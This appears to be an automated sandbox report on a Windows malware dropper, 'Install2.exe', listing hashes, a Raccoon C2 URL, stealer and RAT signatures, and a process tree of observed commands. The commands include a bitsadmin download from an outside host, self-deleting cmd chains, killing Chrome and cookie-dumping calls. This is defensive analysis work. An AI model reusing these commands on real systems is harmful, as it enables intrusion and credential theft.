Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    64s
  • max time network
    1799s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-05-2021 15:44

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 28 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 26 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
      PID:2520
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2748
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2728
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2696
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2512
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1888
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1392
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1300
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1160
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1088
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                          PID:1000
                          • C:\Users\Admin\AppData\Roaming\ctchhrw
                            C:\Users\Admin\AppData\Roaming\ctchhrw
                            2⤵
                              PID:8476
                              • C:\Users\Admin\AppData\Roaming\ctchhrw
                                C:\Users\Admin\AppData\Roaming\ctchhrw
                                3⤵
                                  PID:6628
                              • C:\Users\Admin\AppData\Roaming\ctchhrw
                                C:\Users\Admin\AppData\Roaming\ctchhrw
                                2⤵
                                  PID:2264
                                  • C:\Users\Admin\AppData\Roaming\ctchhrw
                                    C:\Users\Admin\AppData\Roaming\ctchhrw
                                    3⤵
                                      PID:1808
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                  1⤵
                                    PID:1016
                                  • C:\Users\Admin\AppData\Local\Temp\Install2.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:572
                                    • C:\Users\Admin\AppData\Local\Temp\is-T1REM.tmp\Install2.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-T1REM.tmp\Install2.tmp" /SL5="$301DA,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:2796
                                      • C:\Users\Admin\AppData\Local\Temp\is-QAMMB.tmp\Ultra.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-QAMMB.tmp\Ultra.exe" /S /UID=burnerch1
                                        3⤵
                                        • Drops file in Drivers directory
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:2848
                                        • C:\Program Files\Uninstall Information\ZGAADVASRR\ultramediaburner.exe
                                          "C:\Program Files\Uninstall Information\ZGAADVASRR\ultramediaburner.exe" /VERYSILENT
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:532
                                          • C:\Users\Admin\AppData\Local\Temp\is-QPI0B.tmp\ultramediaburner.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-QPI0B.tmp\ultramediaburner.tmp" /SL5="$7002E,281924,62464,C:\Program Files\Uninstall Information\ZGAADVASRR\ultramediaburner.exe" /VERYSILENT
                                            5⤵
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of WriteProcessMemory
                                            PID:4004
                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                              6⤵
                                              • Executes dropped EXE
                                              PID:1484
                                        • C:\Users\Admin\AppData\Local\Temp\7f-9b5fc-423-25eb0-c133e790c4b7f\Dejogokawu.exe
                                          "C:\Users\Admin\AppData\Local\Temp\7f-9b5fc-423-25eb0-c133e790c4b7f\Dejogokawu.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1600
                                        • C:\Users\Admin\AppData\Local\Temp\20-5facf-b04-b6898-62f30dff5a2ee\Baehuhaloky.exe
                                          "C:\Users\Admin\AppData\Local\Temp\20-5facf-b04-b6898-62f30dff5a2ee\Baehuhaloky.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:2540
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rsu0ztnv.knv\sskiper.exe /s & exit
                                            5⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:8656
                                            • C:\Users\Admin\AppData\Local\Temp\rsu0ztnv.knv\sskiper.exe
                                              C:\Users\Admin\AppData\Local\Temp\rsu0ztnv.knv\sskiper.exe /s
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of WriteProcessMemory
                                              PID:8996
                                              • C:\Users\Admin\AppData\Local\Temp\470276660.exe
                                                C:\Users\Admin\AppData\Local\Temp\470276660.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4348
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  8⤵
                                                    PID:6392
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    8⤵
                                                      PID:8140
                                                  • C:\Users\Admin\AppData\Local\Temp\951558220.exe
                                                    C:\Users\Admin\AppData\Local\Temp\951558220.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:8888
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\rsu0ztnv.knv\sskiper.exe & exit
                                                    7⤵
                                                      PID:8044
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 0
                                                        8⤵
                                                        • Runs ping.exe
                                                        PID:2684
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ktzxb1v5.mr3\KiffMainE1.exe & exit
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:6728
                                                  • C:\Users\Admin\AppData\Local\Temp\ktzxb1v5.mr3\KiffMainE1.exe
                                                    C:\Users\Admin\AppData\Local\Temp\ktzxb1v5.mr3\KiffMainE1.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6920
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pey32zvb.xnn\001.exe & exit
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:7068
                                                  • C:\Users\Admin\AppData\Local\Temp\pey32zvb.xnn\001.exe
                                                    C:\Users\Admin\AppData\Local\Temp\pey32zvb.xnn\001.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:7164
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fbdcknao.mhy\installer.exe /qn CAMPAIGN="654" & exit
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4428
                                                  • C:\Users\Admin\AppData\Local\Temp\fbdcknao.mhy\installer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\fbdcknao.mhy\installer.exe /qn CAMPAIGN="654"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • Modifies system certificate store
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:4680
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fbdcknao.mhy\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fbdcknao.mhy\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619891264 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                      7⤵
                                                        PID:5416
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2akg5h4e.xx2\gpooe.exe & exit
                                                    5⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4860
                                                    • C:\Users\Admin\AppData\Local\Temp\2akg5h4e.xx2\gpooe.exe
                                                      C:\Users\Admin\AppData\Local\Temp\2akg5h4e.xx2\gpooe.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4960
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:3476
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:6356
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:6328
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:4824
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\egipxsbk.kui\sskiper.exe /s & exit
                                                        5⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4136
                                                        • C:\Users\Admin\AppData\Local\Temp\egipxsbk.kui\sskiper.exe
                                                          C:\Users\Admin\AppData\Local\Temp\egipxsbk.kui\sskiper.exe /s
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:5124
                                                          • C:\Users\Admin\AppData\Local\Temp\845321879.exe
                                                            C:\Users\Admin\AppData\Local\Temp\845321879.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5344
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                              8⤵
                                                                PID:7856
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                8⤵
                                                                  PID:6732
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                  8⤵
                                                                    PID:9156
                                                                • C:\Users\Admin\AppData\Local\Temp\1249948623.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\1249948623.exe
                                                                  7⤵
                                                                    PID:4564
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwuiko5a.3mx\google-game.exe & exit
                                                                5⤵
                                                                  PID:5620
                                                                  • C:\Users\Admin\AppData\Local\Temp\uwuiko5a.3mx\google-game.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\uwuiko5a.3mx\google-game.exe
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:5792
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                      7⤵
                                                                      • Loads dropped DLL
                                                                      • Modifies registry class
                                                                      PID:5944
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ppn440cz.kec\askinstall39.exe & exit
                                                                  5⤵
                                                                    PID:5836
                                                                    • C:\Users\Admin\AppData\Local\Temp\ppn440cz.kec\askinstall39.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\ppn440cz.kec\askinstall39.exe
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:7264
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                        7⤵
                                                                          PID:9032
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im chrome.exe
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            PID:9188
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zhjl2kiz.ga1\y1.exe & exit
                                                                      5⤵
                                                                        PID:7568
                                                                        • C:\Users\Admin\AppData\Local\Temp\zhjl2kiz.ga1\y1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\zhjl2kiz.ga1\y1.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:7812
                                                                          • C:\Users\Admin\AppData\Local\Temp\Ja1JDlqQQ4.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Ja1JDlqQQ4.exe"
                                                                            7⤵
                                                                              PID:5276
                                                                              • C:\Users\Admin\AppData\Roaming\1620150640245.exe
                                                                                "C:\Users\Admin\AppData\Roaming\1620150640245.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620150640245.txt"
                                                                                8⤵
                                                                                  PID:5252
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Ja1JDlqQQ4.exe"
                                                                                  8⤵
                                                                                    PID:7428
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping 127.0.0.1 -n 3
                                                                                      9⤵
                                                                                      • Runs ping.exe
                                                                                      PID:6600
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\zhjl2kiz.ga1\y1.exe"
                                                                                  7⤵
                                                                                    PID:6412
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout /T 10 /NOBREAK
                                                                                      8⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:7496
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gyppibgg.gu3\setup.exe & exit
                                                                                5⤵
                                                                                  PID:7728
                                                                                  • C:\Users\Admin\AppData\Local\Temp\gyppibgg.gu3\setup.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\gyppibgg.gu3\setup.exe
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:7868
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\gyppibgg.gu3\setup.exe"
                                                                                      7⤵
                                                                                        PID:8104
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 1.1.1.1 -n 1 -w 3000
                                                                                          8⤵
                                                                                          • Runs ping.exe
                                                                                          PID:8264
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\he5jjj3a.ha3\toolspab1.exe & exit
                                                                                    5⤵
                                                                                      PID:7912
                                                                                      • C:\Users\Admin\AppData\Local\Temp\he5jjj3a.ha3\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\he5jjj3a.ha3\toolspab1.exe
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:8068
                                                                                        • C:\Users\Admin\AppData\Local\Temp\he5jjj3a.ha3\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\he5jjj3a.ha3\toolspab1.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:8212
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylol2aqy.2ty\GcleanerWW.exe /mixone & exit
                                                                                      5⤵
                                                                                        PID:8016
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z3h14te2.owq\SunLabsPlayer.exe /S & exit
                                                                                        5⤵
                                                                                          PID:8160
                                                                                          • C:\Users\Admin\AppData\Local\Temp\z3h14te2.owq\SunLabsPlayer.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\z3h14te2.owq\SunLabsPlayer.exe /S
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Drops file in Program Files directory
                                                                                            PID:8360
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2BD5.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:8992
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2BD5.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:8280
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2BD5.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:9156
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2BD5.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:7840
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2BD5.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:1788
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2BD5.tmp\tempfile.ps1"
                                                                                                        7⤵
                                                                                                          PID:4672
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp2BD5.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:9212
                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                            7⤵
                                                                                                            • Download via BitsAdmin
                                                                                                            PID:9180
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ptv25mgo.cwb\005.exe & exit
                                                                                                        5⤵
                                                                                                          PID:8252
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ptv25mgo.cwb\005.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\ptv25mgo.cwb\005.exe
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:8416
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c1i4u0vv.x0v\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                          5⤵
                                                                                                            PID:8516
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\c1i4u0vv.x0v\Setup3310.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\c1i4u0vv.x0v\Setup3310.exe /Verysilent /subid=623
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:8600
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-V8J91.tmp\Setup3310.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-V8J91.tmp\Setup3310.tmp" /SL5="$403DC,138429,56832,C:\Users\Admin\AppData\Local\Temp\c1i4u0vv.x0v\Setup3310.exe" /Verysilent /subid=623
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:8652
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-VIKP8.tmp\Setup.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-VIKP8.tmp\Setup.exe" /Verysilent
                                                                                                                  8⤵
                                                                                                                    PID:6832
                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe"
                                                                                                                      9⤵
                                                                                                                        PID:4340
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          10⤵
                                                                                                                            PID:4108
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            10⤵
                                                                                                                              PID:8016
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              10⤵
                                                                                                                                PID:7444
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                10⤵
                                                                                                                                  PID:1504
                                                                                                                              • C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe"
                                                                                                                                9⤵
                                                                                                                                  PID:4468
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                    10⤵
                                                                                                                                      PID:5384
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im RunWW.exe /f
                                                                                                                                        11⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:5072
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 6
                                                                                                                                        11⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:4032
                                                                                                                                  • C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe"
                                                                                                                                    9⤵
                                                                                                                                      PID:4384
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                        10⤵
                                                                                                                                          PID:5440
                                                                                                                                      • C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe"
                                                                                                                                        9⤵
                                                                                                                                          PID:7072
